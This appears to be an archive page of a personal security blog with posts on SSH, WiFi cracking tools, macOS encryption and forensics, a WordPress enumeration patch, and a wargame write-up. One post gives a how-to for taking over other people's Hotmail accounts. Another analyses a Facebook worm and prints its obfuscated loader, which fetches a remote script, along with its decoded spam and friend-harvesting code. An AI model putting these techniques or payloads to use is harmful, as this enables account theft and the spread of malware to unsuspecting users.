Security

SSH known host on OSX

0
9 jours
by in mac, Networking, OS, Security

To manage my multiple machines and test computers on my local network I use SSH, and often after reinstalling a test machine I want to connect back by SSH and my Mac just pops me back this message :

noktec:release Noktec$ ssh xavier@192.168.0.2
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
********************************
Please contact your system administrator.
Add correct host key in /Users/Noktec/.ssh/known_hosts to get rid of this message.
Offending key in /Users/Noktec/.ssh/known_hosts:12
RSA host key for 192.168.0.2 has changed and you have requested strict checking.
Host key verification failed.

I usually find this message quiet annoying, but knows the commands to avoid this problem, but today while speaking with a friend, he told me that he was usually deleting the SSH keys by hand in its « known_hosts » file. As there are some appropriate commands to do this I thought it would be a good idea to post them on my blog, and here they are :

ssh-keygen -R machine-name
ssh-keygen -R 192.168.0.2
ssh-keygen -R MyMachine.com

And that’s it, you will now be able to delete the ssh key without having to modify your « known_hosts » file by hand.

 

Installing Gerix on Ubuntu from Backtrack’s repository

0
12 jours
by in Linux, OS, Security

GerixWiFiCracker is GUI for Aircrack-ng suite, is designed for pentesting in a realworld with efficent and userfriendly graphic interface.

Note: This small tutorial is based on the repositories from backtrack 5 R1 and ubuntu 11.10

The first step is to add those lines to « etc/apt/sources.list »

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing



deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing



deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Once those lines added to the sources.list files you can run the command

$ sudo apt-get update

And finally to install gerix you can finally run this last command :

$ sudo apt-get install gerix-wifi-cracker-ng

And that’s it.

 

 

This Blog supports the Blackout operation and is against SOPA/PIPA

0
36 jours
by in Security, Web

The USA is about to vote restrictive bills called SOPA and PIPA

These bills will allow the US government to censor websites.

To understand SOPA/PIPA  I invite you to read the following paper:

http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

and to have a look at the following video from the Anonymous group.

 

I invite you also to retweet the following link http://sopastrike.com/on-strike/

 

See you soon.

« Hacking » Friends Hotmail’s Accounts

0
82 jours
by in Security, Web

There are a few existing ways of hacking an hotmail account, such as brute-force, or the secrete answer/question, but today I(and friends) found another « way » of doing it (that I never heard before)

Long story short :

To make it work, the hacker needs to know the « save » e-mail address, and hope, this address has been deleted.

When you forgot your password it is possible to ask hotmail to « Email me a reset link« , when clicking on this link hotmail  shows the user the e-mail address to which it is going to send the reset link, for example :

my*****@hotmail.com

But in a few cases, this e-mail address might have been already deleted by hotmail (if you didn’t used it anymore, or if the target didn’t used it anymore), to verify that fact, the hacker can simply  return to the following link:

« Can’t access your account » (on the sign-in page)

From there the hacker can tick the  « I forgot my password » radio buttonfollowing the link the hacker will find the page displayed below :
And here comes the trick :

IF the address does not exist anymore, the hacker will receive the following message :


If hotmail returns the following message the trick is to « recreate » this e-mail such as creating a new account, and then restore the password from the account you wanted to get the password back at first.

 

And that’s it, hotmail will not verify that the previous e-mail had been deleted or not, it will simply send you the restore password link.

 

Have fun.

Encrytpted Folder on Mac OS X

1
103 jours
by in mac, OS, Security

Today a friend of mine told me that  while he was traveling  his laptop was stolen, unfortunately for him, it was his work laptop containing all his data, projects, presentations and a few clients data.  Fortunately, he told me that the laptop was using truecrypt, that all the files contained on the laptop where encrypted and that no one would be able to use the laptop without its consent.

After this small conversation, I began to freak out about my mac being stolen and my projects and personal data being published on the internet so I decided to encrypt my drive, and my fist thought was to use truecrypt or  firevault on my mac, but I wasn’t sure to like the fact that my drive would be totally encrypted and that I would not be able to use a forensic method if my drive was crashing. Therefore I finally decided to create an encrypted folder on my mac.

 

This is the way of doing it step by step:

  • On your desktop create the folder that you want to encrypt ( in my case « Projects »)
  • Open the Application folder and open the Utilities folder
  • Open the Disk Utility application

From an existing folder:

in the Disk Utility application :

  • Goto « file » -> « Disk Image From Folder »
  • Chose the folder you want to encrypt (in my case « Projects »)
  • Chose the encryption (the stronger the best)  AES 256 bit
  • Enter your Pass-phrase  (PLEASE) do not use 5 chars ! *
  • Click on
  • The process of creating you encrypted folder will begin.

From a non Existing Folder:

 

As you may see the folder is an image (Projects.img) which means that you can mount and unmount the encrypted image or even copy it to an USB drive.

  • Goto « File » -> « Blank Disk Image »
Encrypted Disk Image

Encrypted Disk Image

  • Choose the Size (I took 8.3 GB)
  • Choose the Encryption (AES 256-bit)
  • Click on Create
  • Enter your pass-phrase

 

Now you will find a encrypted folder on your Desktop at any time, and when you will click on it, it will ask you the pass-phrase to open it.

 

And That’s it.

 

 

*To be secure a password rely on:

  • On the letters you are using ( A-Z, a-z)
  • On the numbers your are using (0-9)
  • On the special chars ( @, /, !, #, etc)
  • BUT ALSO on the length of it

using a password like the following  « ABd2@ »   will be anyway less secure than using  « ThisIsMyPasswordAndILikeToWearLargeJeansBecauseMyFavoriteNumberIs42″ so please consider using a nice and long and secure password.

 

Patch WordPress UserName Disclosure

2
266 jours
by in Security, Web

This 26 may, a researcher (Veronica Valero of Talsoft S.R.L.) posted  a security threat  affecting  WordPress blogs on Direct Object Reference.

A reply posted by « Zerial » on the mailing list explained another vulnerability on WordPress.

It is possible via a simple test on the login box to know if a username is  used on the blog. The test is pretty simple it analyse the return message while trying to login on WordPress.

For example on the following website (http://www.noktec.be/wp-admin/)  while trying to log with the user-name « test » (fake)

The return message given when the account was active was :

Error: The password you entered for the username test is incorrect. Lost your password ?

 

The return message given when the account was not active was:

Error: Invalid username. Lost your password ?

This vulnerability was already report in the OSVDB 55713 in 2009 but was still active.

A patch was released by « EthicalHack3r » :

 

wp-includes/user.php:91

Change:

 return new WP_Error('invalid_username', sprintf(__('ERROR: Invalid username. Lost your password< /a>?'), site_url('wp-login.php?action=lostpassword', 'login')));

To:

return new WP_Error( 'invalid_username', sprintf( __( 'ERROR: Invalid username and/or password.')));

and change

wp-includes/user.php:111

Change:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: The password you entered for the username %1$s is incorrect. Lost your password?' )

To:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: Invalid username and/or password.')));

( source : EthicalHack3r)

 

And that’s it.

FaceBook worm quick and dirty review

3
312 jours
by in Programmation, Security, Web

Introduction:

Facebook is very popular among the world, and loads of « hackers »/ « script kiddies »  would like to send messages to your contacts for fun and profit. In this little quick and dirty review, I will briefly analyse a worm that spreads on Facebook.

Analyse:

A few minutes ago, I was invited by a friend to a strange event, which told me to click on the following link :

  1. « http://stump.ws/rocibv ».
  2. « http://www.littleurl.net/a5264c »


This link was supposed to give you a trick to see « how much people visited your profile ». Instead you get this ! ( one Event inviting all your friends to do the same and and Pseudo)


 

Once on the page, there was a field containing JavaScript, and they asked people to copy paste this link behind the facebook link, like the following  www.facebook.com/My_Malware_JS_code.


Below you may see the JavaScript code encoded in HexaDecimal (16)

javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

To understand a bit better what was happening I converted the hex to char and you may see the result below

javascript: var _0x80be=["srcscriptcreateElement","//iabelo.com/e.js","appendChild","body"];(a=(b=document)[_[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

Some « hackers » even do not encode the page and it looks like this :

javascript:(a=(b=document).createElement('script')).src='//icalinko.com/styll.js',b.body.appendChild(a);void(0)

 

I’m not a JavaScript expert, but I can read code, and this looked like a call to the website www.iabelo.com/e.js which executed a remote JavaScript file. I copied it, and you may look part of  it below ( again encoded mainly in Hex) To see the code. ( this is not the full code)

var _0x5c0f=["\x53\x61\x6C\x75\x74\x20\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x20\x4A\x65\x20\x76\x69\x65\x6E\x73\x20\x64\x65\x20\x64\x65\x63\x6F\x75\x76\x72\x69\x72\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x65\x74\x69\x65\x7A\x20\x75\x6E\x20\x64\x65\x20\x6D\x65\x73\x20\x73\x70\x65\x63\x74\x61\x74\x65\x75\x72\x73\x20\x70\x72\x6F\x66\x69\x6C\x20\x68\x61\x75\x74\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x74\x72\x6F\x75\x76\x65\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x0A\x77\x74\x66\x20\x67\x75\x79\x73\x2C\x20\x76\x6F\x75\x73\x20\x65\x73\x74\x20\x61\x70\x70\x61\x72\x75\x20\x63\x6F\x6D\x6D\x65\x20\x6C\x65\x20\x70\x65\x75\x70\x6C\x65\x20\x71\x75\x69\x20\x6D\x27\x61\x20\x6C\x65\x20\x70\x6C\x75\x73\x20\x74\x72\x61\x71\x75\x65\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x76\x6F\x69\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x6E\x64\x2E\x70\x68\x70","\x4A\x27\x61\x69\x20\x61\x70\x70\x72\x69\x73\x20\x75\x6E\x65\x20\x66\x61\xE7\x6F\x6E\x20\x64\x65\x20\x76\x6F\x69\x72\x20\x71\x75\x69\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x0A\x0A\x53\x75\x69\x76\x65\x7A\x20\x63\x65\x73\x20\xE9\x74\x61\x70\x65\x73\x20\x73\x69\x6D\x70\x6C\x65\x73\x20\x70\x6F\x75\x72\x20\x74\x72\x6F\x75\x76\x65\x72\x3A\x0A\x0A\x74\x6F\x75\x74\x20\x63\x65\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x61\x76\x65\x7A\x20\xE0\x20\x66\x61\x69\x72\x65\x20\x65\x73\x74\x20\x64\x27\x61\x6C\x6C\x65\x72\x20\x73\x75\x72\x20\x63\x65\x20\x6C\x69\x65\x6E\x20\x65\x74\x20\x73\x75\x69\x76\x65\x7A\x20\x6C\x65\x73\x20\x69\x6E\x73\x74\x72\x75\x63\x74\x69\x6F\x6E\x73\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x56\x6F\x69\x72\x20\x71\x75\x69\x20\x61\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x21","\x56\x6F\x75\x73\x20\x64\x65\x76\x72\x69\x65\x7A\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x20\x76\x65\x72\x69\x66\x69\x65\x72\x20\x63\x65\x6C\x61\x2E\x20\x49\x6C\x20\x66\x6F\x6E\x63\x74\x69\x6F\x6E\x6E\x65\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x21","\x43\x27\x65\x73\x74\x20\x6C\x65\x20\x6E\x6F\x75\x76\x65\x61\x75\x20\x63\x6F\x64\x65\x20\x71\x75\x65\x20\x74\x6F\x75\x74\x20\x6C\x65\x20\x6D\x6F\x6E\x64\x65\x20\x61\x20\x70\x61\x72\x6C\x65\x21","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x77\x68\x69\x6C\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x4F\x72\x20\x69\x66\x20\x79\x6F\x75\x20\x67\x65\x74\x20\x73\x69\x63\x6B\x20\x6F\x66\x20\x77\x61\x69\x74\x69\x6E\x67\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x28\x72\x65\x73\x75\x6C\x74\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x6C\x65\x73\x73\x20\x61\x63\x63\x75\x72\x61\x74\x65\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"]

Once decoded in readable characters it appeared like the following :

var _0x5c0f=["Salut %firstname%  Je viens de decouvrir que vous etiez un de mes spectateurs profil haut, vous pouvez trouver votre exemplaire a  http://stump.ws/rocibv""%tf% %tf% %tf% %tf% %tf% %tf%
wtf guys, vous est apparu comme le peuple qui m'a le plus traque, vous pouvez voir votre exemplaire a http://stump.ws/rocibv""http://www.iabelo.com/end.php""J'ai appris une façon de voir qui consulte votre profil
Suivez ces étapes simples pour trouver:
tout ce que vous avez à faire est d'aller sur ce lien et suivez les instructions http://stump.ws/rocibv"

'Voir qui a consulte votre profil!"

"Vous devriez vraiment verifier cela. Il fonctionne vraiment!""C'est le nouveau code que tout le monde a parle!"

"href"

"location""top""GET"

"open"

"onreadystatechange""readyState""status""responseText"

"send"

"/"

"match""cookie""@[""id"":""name""]""""&""=""POST""Content-Type"

"application/x-www-formurlencoded""setRequestHeader""div""createElement""display"
"style""block""position""absolute""width""%""height""left""px""textAlign""center""padding""4px""background""#FFFFFF""zIndex""innerHTML"" 
Please wait, this can take a little while...

Or if you get sick of waiting, you can click here (results may be less accurate)"

"appendChild""body""data""firstChild""navAccountName""getElementById""?""/ajax/choose/?__a=1""event""AsyncRequest"

"/ajax/typeahead/first_degree.php?__a=1&viewer="

"&token=""&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha""length""push""getTime""setTime""getMonth""getDate""getFullYear""getHours"",""join""on""Create Event""new""/events/create.php""/ajax/chat/buddy_list.php?__a=1""substr""("")""buddy_list""payload""nowAvailableList""random""floor"

"%firstname%""toLowerCase""firstName""userInfos""replace""/ajax/chat/send.php?__a=1""/ajax/browser/friends/?uid=""&filter=all&__a=1&__d=1""shift""fetched friends: ""home""pop""%tf%""search""xhpc_message_text""xhpc_message""message text: ""/ajax/updatestatus.php?__a=1""profile"];

As I said, I’m not an expert in JavaScript, but part of the quotes are messages, that should be posted somewhere, and the other parts are links and JavaScript commands requesting the creation of a group, and the creation of some chat messages, to all the contacts, as well as the browsing of all the contacts probably to « post » the creation of the group  to everybody.

My analysis of the worm will not go further because I have no much  time, but it gives an idea of « how it works » , and on what may happen to people who are clicking everywhere and copying strange links on facebook.

 

Btw: It looks like, telling people they will know who viewed their profile is very attractive to lambda users, because I got about 20 of those propositions now. If someone is going further in the analyse let me know I would be pleased to read « full » article on it.

 

How to avoid this ? (conclusion)

  • Look the kind of link  pasted ( if it looks strange, do not click on it).
  • If you don’t really know what is going on, ask a friend to look at it with you ( before clicking on whatever).
  • In this case the « french » used  is really bad, this may be a very good clue !
  • Having an updated anti virus « may » / « could » / « should » help you.
  • If the link seems obvious ( a daughter had sex with her [whoever]) YES IT’s A TRAP !
  • The cake is a lie, don’t rely on it !

Please do not click on what ever link,  this kind of links may do many things, such as allowing people to view your pictures, or retrieve many informations you « set » as confidential , and many other stuff (which are only limited by the imagination of the hacker).

 

Forensic Bookmark.plist from Safari

0
572 jours
by in mac, OS, Security

I was reading some documents on Mac Os X forensic, and I was searching
how to get back the Bookmark.plist from safari to parse it and read it easily …

I knew that this file is located in the following folder :

~Library/Safary/Bookmarks.plist

I was thinking that plist files where always XML documents and tried with python to read the file, I opened python and typed the following commands.

>>>  import plistlib
>>> plist.readPlist('Bookmarks.plist)

Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 78, in readPlist
rootObject = p.parse(pathOrFile)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 405, in parse
parser.ParseFile(fileobj)
xml.parsers.expat.ExpatError: not well-formed (invalid token): line 1, column 9

Yeah ! Error …

I got back to my shell and tried to read it with

$ cat Bookmarsk.plist

[...] it was not an XML output at all !

I directly decide to go to  developer.apple.com/ , to find the plist use, and find out that some plist files are in

BINARY FORMAT PROPERTY LISTS

WTF ??

hopefully the command was given to translate it to XML

plutil -convert xml1 -o - Bookmarks.plist

I tried it, and it gave me a cool XML format.

I could then put the output of this command in an XML file and use it.

Hidden password in an extended attribute

2
584 jours
by in Linux, mac, OS, Security

Today I was playing with some forensic challenges and I got surprised by
one of them. It was going like this : « A password is hidden … but where »

The file was an image, and my first idea was to try some steganography tools,
but after one little hour, some researches … I began to be very bored, and
asked my friend Google about hidden data on OS X.

After a few minutes I found the answer xattr
the EXTENDED ATTRIBUTES … they are kind of similar to the alternate
data stream in Windows.

It’s why I decided to explain you how it was working :

  • Open a shell and enter into Python
>>> xattr.listxattr("test.png")
(u'com.apple.metadata:kMDItemWhereFroms', u'user.comment')
>>>

as you may see … there are some attributes, and one of them is « user.comment », after
some researches on the internet ( 1 min ) I discovered how to print it out :

>>> xattr.getxattr("test.png", "user.comment")
'Password: XnHjst6&'
>>>

And the challenge was finished ! It was the first time I saw the extended attributes … and I found it very interesting.

have fun

Intruded Nº4

0
634 jours
by in Linux, OS, Security

For the 4th one, we remeber that there was a program called
« level4″ in the /wargame folder, let’s go to it.

first run :

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

interesting .. it looks like the 2 challenge, let’s disassemble the main part : 

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type  to continue, or q  to quit---q
Quit

Again, we can take the interesting part :

0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de

let’s make a break point on it, and run it until it ask the password : 

reakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ there is an interesting thing, I had to push 3 times « s » to arrive to my break point
( I should analyse this, anyway let’s continue ) /!\

let’s see what’s happening when we analyse $esp 

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

Ok, we got our password back, so, let’s go a bit further

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd: « snlprintf\n »
(gdb)

ok .. here there is a little trick "snlprintf" is the password we are searching for,
they just put a " C " name as string. the clue is "\n" at the end of snlprintf ;)

let's try the password :

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)

Next »
Get Adobe Flash playerPlugin by wpburn.com wordpress themes
Go to Top